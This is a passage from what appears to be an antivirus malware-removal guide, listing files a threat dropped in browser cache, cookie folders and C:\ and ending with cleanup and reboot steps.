    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjzgg1[1].htm (1466 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T62H1GAA.txt (231 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg456[1].htm (1539 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\qqkjz12[1].htm (1273 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjz11[1].htm (813 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\57FH349C.txt (77 bytes)
    C:\SkinH_EL.dll (178 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\mcgg[1].htm (75 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GN113R0R.txt (99 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G380XWV8.txt (77 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
